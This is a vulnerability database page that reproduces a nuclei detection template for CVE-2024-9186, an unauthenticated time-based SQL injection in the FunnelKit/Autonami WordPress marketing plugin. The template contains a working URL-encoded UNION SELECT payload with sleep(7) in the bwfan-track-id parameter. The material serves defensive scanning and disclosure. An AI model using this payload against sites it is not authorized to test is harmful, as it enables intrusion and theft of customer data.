Lucene search
K

Automation By Autonami < 3.3.0 - SQL Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit WordPress plugin before 3.3.0 is vulnerable to SQL Injection

Related
Refs
Code
id: CVE-2024-9186

info:
  name: Automation By Autonami < 3.3.0 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit WordPress plugin before 3.3.0 does not sanitize and escape the bwfan-track-id  parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks.
  impact: |
    Unauthenticated attackers can exploit time-based SQL injection through the bwfan-track-id parameter to extract sensitive database information including user credentials, email addresses, WooCommerce customer data, and marketing automation information.
  remediation: |
    Fixed in 3.3.0
  reference:
    - https://wpscan.com/vulnerability/fab29b59-7e87-4289-88dd-ed5520260c26/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9186
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-89
    cve-id: CVE-2024-9186
    epss-score: 0.02241
    epss-percentile: 0.80675
  metadata:
    verified: true
    max-request: 2
    vendor: funnelkit
    product: wp-marketing-automations
    framework: wordpress
    fofa-query: body="wp-content/plugins/wp-marketing-automations/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-marketing-automations,time-based-sqli,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/wp-marketing-automations")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        @timeout 20s
        GET /?bwfan-track-id=test%27%20UNION%20SELECT%201%2C1%2C%27%27%2CNOW()%2CNOW()%2C1%2C%27%27%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C%27%27%2CNOW()%2C%27%27%2CNOW()%2C1%2C1%2Csleep(7)%23&bwfan-track-action=click HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=7"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100ab599d42821ad59aadd84821cdfff1223ed6e907024542fb227ad93a69fc9a6c022100b6a5a054853ff48d1aad75810baa9e0e6eb7700b49eeac5752c38318802641e7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.18.6
EPSS0.02241
SSVC
32